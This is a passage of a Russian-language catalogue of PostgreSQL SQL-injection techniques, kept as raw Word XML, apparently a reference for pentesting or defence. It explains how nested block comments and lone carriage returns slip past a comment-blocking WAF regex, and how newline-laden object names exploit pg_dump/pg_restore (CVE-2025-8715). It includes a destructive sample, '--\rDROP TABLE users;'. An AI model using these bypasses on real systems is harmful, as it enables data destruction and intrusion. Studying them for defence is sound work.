        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> используется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whitespace-эквивалент</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между токенами для обхода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-regex в WAF. Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атака на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>семантику</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсера комментариев, разная по цели и механике. Закреплено в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conventions.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для обхода whitespace-фильтра — в 3.9.6; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как nested-form — в 3.12.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C0570" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.0 (WAF 3.9-категории)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержит правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--|/\*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (любые SQL-комментарии). 3.12 — про обход именно этого правила и про edge case-формы, которые WAF-pattern не учитывает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD976FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — newline в identifier через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пересекается с 3.12.3 на серверной стороне; 3.12.3 фокусируется на client-side chain через pg_dump/restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB60DC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (Хронология 2025)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-8715 целиком разбирается там; в 3.12.3 — фокус на сам класс атаки и применимость.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3AF3D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Общая модель уязвимости 3.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA95E91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.12.1 и 3.12.2 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input-фильтр-bypass</w:t>
      </w:r>
      <w:r>
        <w:t>: атакующий передаёт payload, который sanitizer/WAF трактует как ничем не опасный (комментарий или whitespace), но PG-парсер видит активный SQL. То есть это close родственники 3.9 (filter bypass), но через специфику lexer-edge cases, не encoding tricks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DA3E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.12.3 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client-side chain через persistent state</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: атакующий создаёт объект в БД с опасным именем (даже через legitimate-операцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), и payload активируется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>позже</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, когда DBA запускает pg_dump → pg_restore на другом хосте. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>второй-порядка injection</w:t>
      </w:r>
      <w:r>
        <w:t>: точка ввода и точка execution разделены по времени и месту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A512AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Структура подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA8788" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   **3.12.1 Вложенные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">** — обход sanitizer-ов, которые ищут первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как закрытие комментария. PG имеет nested-aware parser с PG 7.4. Sanitizer на </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>старых ModSecurity / самописных pre-processor-ах — non-nested-aware → разный view payload-а. Три payload-карточки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE62F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.2 `--` и CR/LF/CRLF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход sanitizer-ов, нормализующих line-endings. PG считает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CR) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (LF) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>независимо</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как terminator однострочного комментария. Если фильтр strip-ает только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, или ловит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> целиком — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сам по себе проходит. Три payload-карточки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE69F2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.3 Newline в идентификаторах (R25, CVE-2025-8715)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — second-order attack через pg_dump/pg_restore chain. Атакующий с правом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт объект с embedded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в имени; pg_dump кладёт имя в SQL-комментарий внутри dump-script; psql при restore видит ломанный комментарий и исполняет injected SQL — потенциально с client-side RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t>. Регрессия CVE-2012-0868, исправлена в августе 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D756335" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6BBB5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries) vs 3.12.2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.12.2 может комбинироваться с 3.5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--\rDROP TABLE users;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — первая команда обрывается newline в комментарии, вторая выполняется. Но 3.5-stacking блокируется extended-protocol в большинстве драйверов; 3.12.2 — про обход sanitizer-а до отправки на сервер. Граница: 3.5 — wire-protocol; 3.12.2 — application-уровень.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF3007" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10 (CTE-based) vs 3.12.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Не пересекаются. CTE — про write-effects через single-command; 3.12 — про парсер-комментариев.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE26F8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection) vs 3.12.3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.16 — серверная атака через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; 3.12.3 — client-side chain через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_dump-сериализацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quoted-identifier-ов с embedded newline. Разные точки в pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDE93D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9B53C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.12 преимущественно про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>доставку</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload-а через sanitizer/parser-edge cases, привилегии целевой роли определяются итоговой категорией атаки. Например, 3.12.1 поверх 3.7.1 (COPY FROM PROGRAM) требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; 3.12.3 для setup требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на схеме, а активация — права DBA, запускающего dump/restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430A7F63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимый код для 3.12.1/3.12.2 — общий с 3.9.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5C279" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.12.1 и 3.12.2 используют ту же модель уязвимого кода, что и 3.9 — pattern-based WAF/sanitizer перед SQL-builder приложения (см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Specifically, фильтр из 3.9.0 содержит правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"--|/\*"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — блокирует любые SQL-комментарии. 3.12.1 и 3.12.2 показывают, как обойти именно это правило через specific lexer-edge-cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C256B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для 3.12.3 (R25) уязвимый код — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_dump + pg_restore pipeline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на стороне DBA/CI/CD, не application-эндпоинт. Описан отдельно в карточке 3.12.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0784FA75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388FD6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — спецификация комментариев, включая вложенность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096EE471" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Identifiers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — quoted identifiers, character set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3E6C1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL advisory: CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оригинальная уязвимость pg_dump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC65CB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL advisory: CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — регрессия 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DEC925" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — comment-based filter bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D757EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.12.1 Вложенные `/* /* */ */`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6454DD83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Уязвимый код — см. 3.9.0 (общий WAF с правилом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"--|/\*"</w:t>
      </w:r>
      <w:r>
        <w:t>).**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C2D032" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB9CD55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL — один из немногих SQL-парсеров, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>корректно обрабатывает вложенность</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в block-комментариях </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* ... */</w:t>
      </w:r>
      <w:r>
        <w:t>. Из PostgreSQL Lexical Structure §4.1.5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506EE13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt; *A nested block comment can be implemented by using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pairs. PostgreSQL allows this nesting; the comment ends at the matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token, which is the one that pairs with the opening </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E83195" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* outer /* inner */ ... */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>один</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> комментарий (PG ищет matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через counter, не первый встретившийся). Другие SQL-парсеры — MSSQL, sqlite, многие самописные SQL-pre-processor-ы — обрывают на первом </w:t>
